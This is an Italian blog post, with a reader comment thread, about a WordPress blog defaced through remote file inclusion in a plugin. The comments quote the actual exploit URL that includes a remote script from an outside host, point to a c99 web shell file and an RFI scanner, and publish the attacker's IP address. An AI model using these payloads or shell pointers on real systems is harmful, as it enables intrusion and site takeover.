Questa mattina presto, verso le 06:40, come molti di voi avranno letto dai feed..qualcuno di passaggio e’ riuscito a bucare il blog. Dal momento che non posso fare molto per la sicurezza, ho un ottimo sistema di logging che mi ha permesso di risalire all’indirizzo ip di questa persona 80.114.179.211 (subito segnalato a Netsons) e alle azioni compiute per portare a termine l’exploit.

In questo screenshoot e’ racchiuso il momento “clou” della creazione di un articolo chiamato “Owned” di proprieta’ dell’utente Admin, malauguratamente dimenticato attivo ma con una forte restrizione di privilegi (solo iniziare dei topic):

exploit

>> Continua

Related Posts Plugin for WordPress, Blogger...

Il tuo indirizzo ip:
18.212.239.56

Valutazione 3.00 su 5
happy wheels 2 demo

Category:

Senza categoria

Tags:

Comments Closed

46 Comments

  • Lex79 ITALY Konqueror Linux 11 anni ago

    In pratica il tizio che voleva fare?

  • divilinu ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    @Lex79
    Ha semplicemente creato un nuovo post includendo da remoto una piccola immagine con scritto “hacked”..tutto qua
    Lo script incluso aggiunge una funzione cmd..che viene interpretata dal php, probabilmente sfruttando qualche script bacato di Wassup
    Se qualcuno si ricorda, e’ come quando tempo fa si cercava di attivare la WP-CACHE facendo interpretare al serve uno script che lancia il comando cp o mv..non ricordo..

  • Come hai fatto a risalire al vero ip se poi ha condotto l’exploit dietro proxy?
    Comunque, puoi segnalarlo pure all’abuse di telecom, e un loro ip.

  • Lex79 ITALY Konqueror Linux 11 anni ago

    Ah ok ho capito..certo che ne hanno di tempo da perdere eh? 🙂
    Buona giornata

  • divilinu ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    @destynova
    perche’ quelli che si credono furbi facendo copia e incolla di exploit che si trovano in rete..credono che gli amministratori siano tutti deficienti..e si proxano solo per l’exploit, dimenticandosi che si possono vedere tutti i movimenti che portano a tale exploit

  • ugaciaka ITALY Konqueror Linux 11 anni ago

    in un certo senso è stato gentile, non ti ha fatto male e ti ha fatto notare il problema 🙂

  • Certo che ne hanno di tempo da perdere…mah….
    ma non esiste un modo per proteggersi da questi attacchi?

  • divilinu ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    @uguciaka
    me ne sbatto della gentilezza, non e’ stato gentile..semplicemente non poteva far altro che includere quel file
    I problemi non si fanno notare forzando i siti degli altri prima di andare a scuola..

  • blood ITALY Mozilla Firefox Windows 11 anni ago

    cerca di risalire al responsabile, ma se ne hai la possibilita NON denunciarlo.
    In questa nazione non democratica che è l’italia rischierebbe anni di carcere per accesso abusivo a sistema informatico, che, ne converrai, per una cavolatina del genere, è esagerato.
    Insomma ritengo che rovinargli la vita per questa cosa sia totalmente esagerato..
    cerca di risalire a chi è e se cerca di farti avere le sue scuse.

  • divilinu ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    @blood
    netsons, cosi’ come altri servizi di hosting, ricevono valanghe di segnalazioni di questo tipo. Non succedera’ nulla, il mio e’ un atto dovuto..cosa dovrebbero fare?..denunciare 1000 persone al giorno per queste cose?
    A me oggi e’ andata bene, domani se ti cancellano l’intero blog al quale hai dedicato gran parte del tuo tempo libero..un indirizzo ip non basta..perche’ vorresti avere anche l’indirizzo di casa per riempirlo di schiaffi..te l’assicuro
    😉

  • blood ITALY Mozilla Firefox Windows 11 anni ago

    @divi
    concordo..ma mi riferivo a questo specifico evento che in sè per sè non ha causato per fortuna gravi danni, ma solo fastidio.
    Se ti avesse cancellato l’intero blog, …ok.. una denuncia (con schiaffi annessi) ci stava 🙂

  • Ciao sono l’autore di WassUp, volevo approfondire con te quello che e’ successo perche’ se la stringa utilizzata per l’exploit e’ questa:

    http://divilinux.netsons.org/index.php/2007/02/13/webcam-drivers/
    /include/new-visitor.inc.php/?lvc_include_dir=http://www.mta.cl/galeria2/galery.txt?

    dubito sia per colpa di WassUp in quanto invece era exploitabile con una stringa tipo questa:

    exploit

    In piu’ non basta disabilitare WassUp in quanto l’exploit e’ utilizzabile anche a plugin disabilitato, bisogna o aggiornare il plugin o ELIMINARE la directory “wassup”.

  • divilinu ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    visto?..questo ragazzino mi scambia per un deficiente
    E’ tutta la mattina che tenta di ripetere l’impresa..ma non ce la fa piu’ a creare l’utente o a lanciare comandi:

    http://…./include/new-visitor.inc.php

    ancora qualche log.. e oltre alla segnalazione su Netsons e Telecom lo segnalo alla polizia postale.
    Sta cercando di fare questo

    http://tecnoamigo.es/2008/01/10/sensillo-scaner-de-rfi-en-perl/

  • divilinu ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    @michele
    ciao grazie per la spiegazione (ho modificato l’exploit perche’ troppo lungo)
    Hai ragione, non c’entra nulla wassup (che aggiorno subito perche’ molto utile) si tratta di “semplice” tentativo di file inclusion..
    😉

  • questo tizio è un genio:

    attacca usando exploit di altri senza nemmeno sapere che cosa sta facendo magari
    per giunta usando ie6
    non si protegge neanche quando attacca o non sa/non pensa di essere loggato
    io gli pagherei da bere per la genialità dopo averlo mandato dalla polizia postale…

    tra l’altro spero per te che venga preso 🙂

  • Sfinge ITALY Mozilla Firefox Debian GNU/Linux 11 anni ago

    Ciao Divi, volevo segnalarti che stanotte mentre lavoravo, cercando la home page del tuo blog compariva la schermata di accesso dati per entrare nel tuo blog con le tue credenziali, mi ha incuriosito perchè compariva lo screenshot di accesso che chiedeva di inserire dati, ora ho capito cosa è successo.

  • divilinu ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    @Sfinge
    spiegati meglio..se aggiungi /wp-admin/ all’indirizzo appare la maschera di login..pero’ bisogna avere la password per entrare..c’e’ in qualsiasi installazione di wordpress
    Vuoi dire che hai visto la maschera con gia’ inserito il mio nick e la password?

  • eh sí !! i soliti ragazzetti 13 enni lamer che vogliono farsi fighi davanti agli amici… Vedono un video RFI su youtube e poi cercano un exploit su milworm per sentirsi un dio. Peccato che non sono capaci neanche di fare questo! Questa gente mi fa pena…
    Pensava di prendere per il cu*o divilinu? si sbaglia di grosso 🙂

    ps. se combina qualcosa a questo blog… se trovo un ip o sito gli faccio vede io! >.<

    ciao divi

  • Sfinge ITALY Mozilla Firefox Debian GNU/Linux 11 anni ago

    Divi qualsiasi riferimento al tuo blog googlando, ieri notte, puntava alla maschera di login, non riuscivo a trovare la home page, mi interessavano degli articoli, mi sembrava strano, compariva la maschera, ora non ricordo se c’erano già i tuoi dati inseriti, ma mi ha insospettito la cosa, perchè di solito non mi da quella pagina bensì la home del blog e basta, inoltre c’erano molti riferimenti “divilinu” che puntavano ad altri siti, community, giochi online, ed un tuo profilo completo era in bella esposizione in uno di questi siti, non chiedermi quale perchè non ricordo, però la faccenda mi aveva insospettito.

  • Ciao,
    nel post parli di “un ottimo sistema di logging”.
    Volevo sapere cosa usi.
    L’immagine nel post ne è un esempio?

    Grazie.

    Ciao.

    Filippo

  • Si mettono pure a rimpere le balle sui blog. Menomale che c’è divi… se fosse successo a me, non avrei saputo dove mettere mani 😛 Divilinux, se mi capita ti vengo a disturbare ok? 😛 Ciao e buona continuazione 🙂

  • lol divi spero tu abbia tenuto lo screen del “owned” non capita tutti i giorni di essere attaccato da gente del calibro di Mitnick…. tornando seri mi pare che qualcuno abbia chiamato la persona in questione per quella che è “lamer” 🙂 ciao!

  • divilinu ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    @Sfinge
    ok..non e’ nulla di allarmante..se aggiungi /wp-admin/ all’indirizzo ti trovi di fronte al login..e’ normale
    Quanto al mio nick..prova a cercare divilinu con google e vedi quanti risultati escono..in mezzo poi c’e’ il delirio
    @Olgias
    Cystats..e’ sempre un plugin per wordpress
    @Raw
    ok..hehe
    @GioFx
    grazie della visita

  • divilinu ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    @V
    stamattina ero un po’ addormentato..l’immagine inclusa era talmente piccola che a malapena ho letto “hacked”..non ho pensato di fare uno screen per spettacolarizzare tale schifezza (con tutti i tag che si possono inserire..solo href..ehehe)
    Aggiungo che i backup della board, del database e l’xml dei post sul blog sono aggiornati regolarmente ogni settimana..quindi chi si volesse cimentare in qualche query sql strana.. faccia pure..
    😀

  • beh a me netsons ha cancellato proprio tutto il sito l’altro ieri … e senza dir nulla 🙂
    direi che piu’ exploitato di così, non si puo’ 😛

  • Hersel ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    CIAO DIVILINUX SONO UN FAN DELA COMUNITA’ DI UBUNTU. E MI CHIEDEVO SE AVEVI UBUNTU 7.10 Gutsy Gibbon
    PERCHE’ SE C’E’ L’HAI C’E’ UN MODO PER FREGARE QUEL RAGAZZINO SPASTICO SE SAI IL C++ O IL C O ADDIRITURA TUTTI E 2 APRI IL PORTALE ROOT DI UBUNTU E TI CREI UN IMMUNITA’ CONTRO L’IP DEL RAGAZZINO IN MODO CHE NON ENTRA +
    UNA VOLTA FATTO PUO’ STARE ANNI MA NON ENTRERA’ MAI + NEL SITO.

  • Hersel ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    EHM EHM POTREI ESSERE RISPOSTO?

  • Hersel ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    BE’? DESIDERO SOLO UNA RISPOSTA VOGLIO SOLO AIUTARE ANCHE SE SONO NUOVO DI QUESTO SITO E ODIO CHI LI BUCA ANCHE SE NE SONO CAPACE.

  • Hersel, credo che divilinu abbia letto il tuo post, ma sicuramente non ti risponde perchè avrà altro da fare. Ovviamente ogni aiuto è ben accetto anche se sicuramente saprà cavarsela da solo. 😉

  • divilinu ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    @Hersel
    scusa..non e’ una chat questa..hai sparato 3 messaggi di fila (in maiuscolo)..
    🙂
    Non ho capito perche’ ti riferisci a Ubuntu-it..e’ questo blog ad essere stato colpito
    @Luna
    come mai?

  • Ciao! scusa se ti scrivo qui, ma non ho trovato una sezione contattami…

    grazie per la visita al blog (ma come hai fatto a trovarlo? lol)

    comunque ovviamente l’articolo era per scherzare 😀

    Comunque come ho scritto nell’articolo anche io sto meditando di “trasferirmi”… solo che ultimamente ho un bel pò da fare con l’università e non ho il tempo per fare la migrazione 🙂

    comunque rinnovo il mio in bocca a lupo (crepi).. torna a trovarmi 😉

    ciao a tutti i lettori di divilinu 😉

  • alien321 ITALY Mozilla Linux 11 anni ago

    @divi
    Sta cercando di fare questo

    http://tecnoamigo.es/2008/01/10/sensillo-scaner-de-rfi-en-perl/

    Pessimo script Perl…..invece il file “http://jargames.t35.com/c99.txt?” è fatto molto bene……

  • Ciao divi mi spiace per l’attacco ti consiglio solo di non andare avanti con la denuncia magari è solo un povero cretino di 13 che si diverte facendo così… 😉 ciauz ah complimenti ancora per il blog 😉

  • non capisco perchè si consiglia di non procedere con la denuncia. I lamer sono un male e vanno debellati, se ha 10 anni o ne ha 20 o 50 poco importa! (se è minorenne è ora che i genitori guardino i loro figli, se è maggiorenne azzacci suoi aveva solo da stare attento ed evitare di fare certe cose). Poi una cosa che non capisco, se ha 10-3 anni allora bisogna lasciarlo in pace? Io se a 13anni rompevo na finestra o semplicemente le balotas ad altre persone 1) i miei mi sistemavano lol 2)pagavo le conseguenze. Non credo sia una motivazione valida l’età 😐

  • blood ITALY Mozilla Firefox Windows 11 anni ago

    @V
    perchè non procedere con una denuncia?
    perchè fai entrare un umano in un calvario.
    Se questo è minorenne pagheranno i suoi genitori che magari manco sanno che fa ste cazzate (e non possono ovviamente stare tutto il giorno dietro a cosa fanno i figli).
    Se è maggiorenne gli machci la fedina penale, lo fai magari andare in galera o pagare una supermulta.
    Ora tutto ciò può dare una grande soddisfazione come “vendetta” però veramente mandi quella persona nei casini e pure gravi, che in relazione al danno che ha fatto sono sbilanciati.
    E’ come dire.. michia quel tipo mi ha rotto lo specchietto e se ne è andato e volerlo morire di tumore.
    Ok.. sono cose che si pensano, ma a cuor leggero, metterlo ein pratica, secondo me, è esageratamente cattivo.
    Può essere la nostra piccola vendetta per i torti subiti, ma i VERI torti sono altri nella vita (vedi ad esempio quanti te ne fa lo stato e ti tocca pure star zitto).
    ripeto.. capisco il desiderio di vendetta, ma questo qua se lo denunci, veramente (non sto scherzando) gli rovini la vita sia psicologicamente che familiarmente che economicamente.
    Per quello che ha fatto basterebbe un avviso (anche dalla polizia) o qualcosa che gli faccia capire seriamente cosa rischia, ma senza procedere alla sua distruzione della vita senza avergli dato la possibilità di chiedere prima scusa.
    Confido nel buonsenso e nella ragionevolezza di divilinu perchè questa “stronzatina” fatta un wannabe non debba portare ad un essere umano sofferenze pesanti.

  • l’accesso abusivo su sistemi non pubblici è a querela di parte, come facevi notare netsons difficilmente interverrà ricevendo la segnalazione, ma tu dovresti. e non si tratta di intervenire con una segnalazione alla postale, che serve poco a nulla, ma proprio con una denuncia vera e propria.
    perchè? perchè i colleghi sono talmente oberati da potersi dedicare solo alle denunce, non alle segnalazioni.
    la segnalazione è un qualche cosa di informale, al contrario della denuncia, essedno poi il reato a querela di parte la tua segnalazione finirebbe archiviata.

  • divilinu ITALY Mozilla Firefox Ubuntu Linux 11 anni ago

    ragazzi..denuncia e’ un modo di dire no?..”ti denuncio”..ma si sa che prima c’e’ la querela, e che la polizia postale non puo’ intervenire per queste cose
    Forti di questo, chiunque si comporti come si e’ comportata questa persona, sa di farla franca..almeno spero di avergli rovinato il sonno per qualche giorno. E’ il minimo che si merita, cosi’ la prossima volta dedichera’ il suo tempo ad altro..
    Lo spazio web non e’ mio ma di netsons..se non si segnalano queste cose un giorno potrebbe saltare fuori anche un mass-defacement (come e’ gia’ successo da altre parti) e non solo una piccola intrusione in un blog

  • orchideo ITALY Mozilla Firefox Linux 11 anni ago

    che storia
    hai fatto benissimo a segnalarlo

  • E no!!! Poi chi me le fa le spoilerate su Lost??

    Uccidete il ragazzino!

  • @blood: non sono per niente d’accordo, vendetta sarebbe stata divilinu (esempio sia chiaro) che gli buca il pc e gli devasta il devastabile. Qui si tratta di insegnare a dei mocciosi (d’età o mentali dipende 😛 ) che c’è un limite a tutto. Non sò se hai letto tutti i reply a me ha colpito una cosa detta da divilinu sacrosanta:
    domani se ti cancellano l’intero blog al quale hai dedicato gran parte del tuo tempo libero..un indirizzo ip non basta..perche’ vorresti avere anche l’indirizzo di casa per riempirlo di schiaffi..te l’assicuro pensa se dopo divilinu sto “moccioso” inizia a pomparsi e a rompere i maroni (non per sminuire il lavoro di divi che è eccellente, faccio questo esempio solo per spiegare meglio cosa intendo) a chi lavora. Io ho avuto un solo problema serio con sti mocciosi e l’azienda per cui lavoravo ha perso 5giorni di lavoro a causa di quella che tu magari chiami bravata che và “perdonata”. Se magari fosse stato fermato alle prime lamerate non avrebbe poi fatto il danno maggiore non credi? (ah e per chiarire l’azienda chiese i danni denuncio il bamboccio et quindi il padre, e fidati non lo fece per vendetta, ma per qualcosa chiamata giustizia che sò in Italia essere carente).

  • filo1234 Mozilla Firefox Ubuntu Linux 11 anni ago

    Ciao divi@ solo un consiglio, il ragazzino o chi che sia, sicuramente avrà letto quest’ articolo, ora tu dalla parte della ragione sicuramente, hai pubblicato il suo ip in chiaro, e potrebbe cercare di utilizzare questa tua leggerezza per utilizarla contro di te, avvalendosi della legge sulla privacy, metti caso che anche lui sia vittima di unì accesso alla sua rete non autorizzato… …per quanto mi riguarda hai tutta la solidarità da parte mia… ciauz

  • hum.. cercando un po dagli indizi sono risalito a un argentino di cui so praticamente quasi nome e cognome, ip isp e codice cliente..
    potrei trovare pure il suo numero di scarpe e qual’è il suo piatto preferito.. comunque mi sa che è solo l’autore dell’exploit, e non il bimbo in questione.. (non ho i log quindi non so..)
    comunque qui si capisce quanto sia un vantaggio avere il server proprio, o almeno con accesso ssh e possibilità di smanettamento..
    le risposte http possono essere compresse.. penso anche su ie6 (anche se non so che formato di compressione usa..).. questo ha fatto vari tentativi, immagino sempre con lo stesso ip.. 20gb di ‘A’ si compattano in meno di un mega con bzip2.. ho detto tutto 😀

  • @redshow

    ciao scusami, premetto che non voglio fare polemica, però sarei curioso di sapere come fai a sapere addirittura il codice cliente del ragazzo argentino, essendo che l’ip del proxy è argentino (telefonicamundo) ma l’exploit è partito da un ip telecom italia 😀

  • Pablo RUSSIAN FEDERATION Mozilla Firefox Ubuntu Linux 11 anni ago

    Ciao, leggo il tuo blog da tempo, ma scrivo per la prima volta.
    Toglietemi una curiosità: se il ragazzino usasse tor in combinazione con il proxy, come diavolo fate a risalire alla prima chiamata (ovviamente la domanda è stupida se l’IP generato è sempre il medesimo ad una distanza ragionevole di tempo)?
    Secondo: se gioca con divilinu per caso bastano, credo, le minacce (già fatte). Se insiste volontariamente (sempre che non sia anch’egli hackerato) penso caschino tutte le precedenti osservazioni: fatta la denuncia, si può sempre ritirare, o no? Almeno si viene a conoscenza della realtà -hacker o cretino?- e ci si comporta di conseguenza…
    Pablopedro (non sono un programmatore, usate un linguaggio per utonti, grazie)

  • Io mi diletto con il sito di un mio amico! Gli ho chiesto il permesso… gli trovo le magagne, entro, lascio un regalino e poi correggiamo gli eventuali errori insieme. 😀

    @Pablo
    Sicuramente il lamer è stato tanto stupido da proxare solo l’attacco e non tutti i passaggi precedenti.

  • Divi una domanda su cystats, a te gli indirizzi ip dei visitatori li visualizza correttamente?
    perchè a me da degli ip strani 😐 del tipo 561.48.38.248

Comments are closed.